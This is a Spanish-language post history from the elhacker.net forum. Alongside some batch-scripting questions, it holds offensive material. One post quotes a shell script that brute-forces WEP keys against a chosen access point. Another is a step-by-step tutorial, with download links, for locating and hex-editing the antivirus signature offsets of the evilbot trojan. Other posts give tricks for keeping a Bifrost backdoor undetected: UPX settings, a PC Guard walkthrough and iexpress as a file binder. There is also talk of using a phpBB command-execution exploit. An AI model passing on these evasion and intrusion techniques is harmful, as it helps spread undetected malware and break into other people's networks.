elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
13 Octubre 2008, 08:44  



  Mostrar Mensajes
Páginas: [1] 2
1  Programación / Scripting / Re: -> Programación BATCH Avanzada. (nuevo) en: 10 Julio 2007, 20:46
tio eres un crack! ;) muchísimas gracias, es cojonudo tu tuto
2  Programación / Scripting / Re: -> Programación BATCH Avanzada. (nuevo) en: 30 Junio 2007, 22:03
creo que no me explique bien con el ejemplo sorry, lo que yo quiero hacer es en una variable string meter el resultado del output de un programa, ya sea el time, como el date o el ture.exe que me devuelve un numero aleatorio del 1 al 10

muchas gracias!!!

PD: lo estoy haciendo actualmente con la dll de cygwin y usando la potencia de  bash, pero me gustaría dejar un .bat limpito y no usar ese tipo de ñapas

saludos!
3  Programación / Scripting / Re: -> Programación BATCH Avanzada. (nuevo) en: 28 Junio 2007, 23:50
buenas caballero xq no me funciona esto?

@echo off
set hola=time /T
time /T
echo %hora%

por qué me da esto?
C:\>jan.bat
23:50
time /T

C:\>

y no
C:\>jan.bat
23:50
23:50

C:\>

muchas gracias caballero!
4  Seguridad Informática / Hacking Wireless / Re: Desencriptar redes IMAGENIO sin clientes y sin paquetes ;) en: 24 Agosto 2006, 10:58
Buenass, tengo un pequeño problema instalando el script pego exactamente esto en un txt y le pongo el nombre de wlandestroy.sh

Código:
#!/bin/sh

#
# ENTRADAS:
#
# $1 : Interfaz
# $2 : Essid
# $3 : AP
# $4 : Channel
# $5 : keys.txt
#

if [ $# -lt 5 ]; then
echo "$0 '[Interfaz] [Essid] [AP] [Chan] [keys]'"
exit 1
fi
iwconfig $1 mode managed
iwconfig $1 essid $2
iwconfig $1 ap $3
iwconfig $1 channel $4
iwconfig $1 key s:AAAAAAAAAAAAA

echo -n " * Esperando conexion: "
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" == "0" ]; do
echo -n "."
sleep 1;
done
echo " OK"

ifconfig $1 192.168.1.254

count=0

for i in `cat $5`; do
iwconfig $1 key s:$i

while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" == "0" ]; do
echo -en "\r * Conexion perdida, esperando..."
sleep 1;
done

arping2 -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1
        count=$((count+1))
        echo -en "\r * Claves probadas: $count"
done



este script lo meto en /usr/local/bin y una vez allí le doi los permisos.
Hasta ahí perfecto

Pero cuando lo ejecuto hago

./wlandestroy.sh

me sale este mensajito:

"-sh ./wlandestroy.sh: /bin/sh^M: bad interpreter: No such file file or directory

Si me dijerais que hago mal os lo agradeceria mucho

Muchas gracias  ;)

pasale el dos2unix al archivo piltrafilla :D que los retornos de carro en windows y linux son distintos

dos2unix wlandestroy.sh
5  Seguridad Informática / Hacking Wireless / Re: Poco tiempo, mucho trabajo. Nos vemos en Octubre... en: 20 Julio 2006, 23:06
Cuidate men, no curres mucho y vuelve pronto!   ;)

nos veremos por estos foros :D suert
6  Seguridad Informática / Hacking Wireless / Re: Desencriptar redes IMAGENIO sin clientes y sin paquetes ;) en: 13 Junio 2006, 09:49
el puñetero amo! :D esta tarde lo pruebo y os cuento
7  Seguridad Informática / Análisis y Diseño de Malware / Re: Detectar Automáticamente Los Offsets que detectan los Antivirus en: 01 Febrero 2006, 11:31
Muy interesante Ture  :) La verdad es que yo siempre que detectan algo que necesito utilizar, opto por modificar el fuente original y recompilar. Alguna vez lo he modificado offsets pero dando palos de ciego al no saber cuales eran los que detectaba el AV. No conocia AV tester pero sin duda me ha encantado  :)

1Saludo y gracias.

me alegro que te guste :) a mi tb me gusta mucho más modificar el fuente original pero no siempre se tiene acceso a el, un troyano como el bifrost que no ocupa nada y tiene conexión inversa ....si lo tienes mandame 1 privado  ;D
8  Seguridad Informática / Análisis y Diseño de Malware / Re: Detectar Automáticamente Los Offsets que detectan los Antivirus en: 01 Febrero 2006, 11:17
El enlace ese del EasyPHP al instalarlo, no tiene ni la mitad de carpetas de las que te salen a ti
perdona por no contestarte antes xq toy de exámenes en la universidad

no te salen las carpetas porke el que se encarga de crearlas es el index.php una vez entras en http://localhost se te crearán las carpetas ;)
9  Seguridad Informática / Hacking Wireless / Re: Manual Básico (in)seguridad wireless . Usando y configurando linux Troppix en: 22 Enero 2006, 00:55
Muy Buena guia Uxio!
10  Seguridad Informática / Análisis y Diseño de Malware / Re: Detectar Automáticamente Los Offsets que detectan los Antivirus en: 05 Enero 2006, 00:48
yo primero modifque el entrypoint con el procdump y variando la posición de la cabezera usando unos jumps, es lo mismo que hace el programa de asphex code relocator. el PE no puedes modificarlo ni la M del principio del archivo son claves que le dicen al sistema operativo que eso es un ejecutable y que tiene una cabecera Portable Executable, mira más abajo que seguro q detectas más de 1 offset ;)
truco: una vez hexedites puedes usar el upx para dejar el server en sus 27 KB y no los 37 pero claro el kaspersky es mu listo y dice eh! vuelve a ser el bifrost, pero que pasa si en vez de upx -9 usas upx -2 server.exe pues en vez de un 62% de compresión obtienes un 67% bueno no está nada mal para seguir indetectado jajaja

otro truco ;) para los que quieran tener un BINDER facil facil y sencillote sencillote (aka juntador de archivos ó varios archivos en un exe :P)

INICO -> Ejecutar y escribir "iexpress.exe" seguro que algunos lo sabían pero otros como yo no tenia ni idea y joder un binder que no sea detectable pues... bienvenido no?? si si lo titutalre como YAB 88888ediction jajajaja pero es tipo vnc y radmin no detectables ^^
PD: gracias microsoft jajaja
11  Seguridad Informática / Análisis y Diseño de Malware / Re: Detectar Automáticamente Los Offsets que detectan los Antivirus en: 04 Enero 2006, 01:41
si se puede, y es más una vez modificas el bifrost

McAfee...No encontrado virus
NOD32....a variant of Win32/Bifrose trojan
F-Prot.....No encontrado virus
VBA32.....Backdoor.Win32.Bifrose.d
Avast......Win32:Bifrose-T [Trj]
AntiVir.... ]no instalado[
Ikarus.....Backdoor.Win32.Bifrose.D
KAV........No encontrado virus

tu mismo muchos antivirus comparten firmas, puede q modificando un par de ellas y usando un buen.... PC guard te keden cosas chulas ;)

PC Guard For Win32 Mini Tut - Makes Unpacked/Packed EXE Undetectable

Open PC Guard

Next To Application Signature click Browse

Select your .exe

Click GENERAL under the PROTECTION OPTIONS tab

UNCHECK Show Warning Messages
CHECK Enable anti-dumping protection
CHECK Virtual Machine Detection

Click CUSTOMIZATION

UNCHECK ALL TICKS

Under PROTECTION METHODS tab Click PLAIN

CLICK PROTECT

** DONE **
12  Seguridad Informática / Análisis y Diseño de Malware / Re: Detectar Automáticamente Los Offsets que detectan los Antivirus en: 03 Enero 2006, 21:57
doy a file open y abro el evilbot, teniendo la seguridad que no me voy a infectar puesto que el olly no ejecuta ni 1 sola instrucción a no ser que se le diga. para ir por ejemplo al "CB" simplemente hay que sumar la imagen del ejecutable con el offset




luego en el olly das a control+G  y vas a la expresión 004000a8
puedes directamente en el código del olly dar a boton derecho -> goto -> expresión

13  Seguridad Informática / Análisis y Diseño de Malware / Detectar Automáticamente Los Offsets que detectan los Antivirus en: 03 Enero 2006, 21:29
Antes de nada Feliz 2006 :)

He visto que por el foro  hay un manual de como sacar las firmas de los antivirus pero es un

poco engorroso, con el sistema que os voy a explicar solo necesitaréis un poco de tiempo para

tener las firmas ;)


1ª Herramientas necesarias

- EasyPHP 1.6 ( apache+php+mysql todo en 1)
ftp://ftp.nerim.net/mirrors/easyphp/easyphp1-6_setup.exe

- AV tester (lo descomprimiremos en la carpeta www de easyphp)
http://membres.lycos.fr/rogergirardin/?op=8&link=./generator/av_tester_v1.22.rar

- Troyano que deseáis buscar los offsets (yo he elegido un viejo conocido evilbot)
http://www.securityforest.com/downloads/bots/evilbot.rar

- El editor del evilbot para nostalgicos
http://www.securityforest.com/downloads/bots/edit_evilbot.rar

      [=========]

Bueno pues manos a la obra :D una vez teneis instalado el easyPHP y en funcionamiento

descomprimis en la carpeta www el archivo comprimidor av_tester*.rar esto lo que nos creará será

una serie de carpetas y ficheros a los cuales accederemos a través del navegador.
Antes de abrir el navegador copiamos el troyano/virus/malware a la carpeta "exes" de "www"



Abrimos el navegador apuntando a localhost y tendremos este interfaz



Ahora clikeamos en clone gen y volvemos a dar a clonar el archivo que queremos, esto lo que nos

creará en la carpeta "result" será un clon por cada bit, cuando el navegador nos indique que ha

terminador de clonar

   

Cogeremos el antivirus del que deseamos conocer las firmas (yo voy a utilizar kaspersky)



scanearemos esa carpeta "result" y cuando tengamos borrados todos los archivos que son

detectados como virus solo nos falta darle via web a "offsets + exa edit" gracias a los archivos

que quedan vivos después de la limpia del antivirus el av tester sabe donde están los offsets



Ahora solo tenemos que ir al Hexeditor (yo utilizo Hex Workshop) y posicionarnos con el GOTO por

ejemplo en el offset 168 ahi vemos la "CB" que nos decía el av tester




Y ahora la Parte por la cual muchos dicen que los programas se les cascan a la hora de hexeditar

ese valor. Abrimos el evilbot.exe con el ollydbg 1.10 y vemos como el CB junto con 00

corresponde a un codigo de operación y unos operandos "ADD BL,CL" si nosotros hexeditamos y

ponemos un CC obtenemos que la operación cambia de una suma de "bl" con "cl" a "ADD AH,CL" yo

creo que se nota la diferencia no? xq unos cascan y otros non ;) si teneis la suerte que

cambiais la suma por una operación similar (primero realizais la suma en un registro auxiliar y

depues ese registro lo moveis al resultado pues el ejecutable funciona :) tb si introducis nops

y saltos jmp podeis cambiar el código al programa pero sigue haciendo el mismo algoritmo

   

Si me entero de algo más actualizaré el mini manual, para cualquier duda y/o correción/añadido

teneis el foro y mi email nachot (at gmail dot) com
14  Seguridad Informática / Bugs y Exploits / Re: phpBB <= 2.0.17 remote command execution exploit en: 26 Diciembre 2005, 11:55
lo mismo digo, crea el usuario pero no se si el comando puede ser con parámetros tipo tftp -i ip get nas.txt o si son comandos atómicos npi

eso si chavales no espereis ver un output pork el exploit no tiene esa funcionalidad hombre si va el tftp algo se podría modificar ese perl :) yo me encargaría pero q comandos son? comandos sql? alguien que nos ilumine
15  Seguridad Informática / Bugs y Exploits / Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability en: 17 Diciembre 2005, 20:49
Ya ha parcheado el señor Gates sus Explorers, solamente ha tardado 1 mes ;D ahora la pregunta es, ¿q ha estropeado al "arreglar" esto?  ;)
Páginas: [1] 2






Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC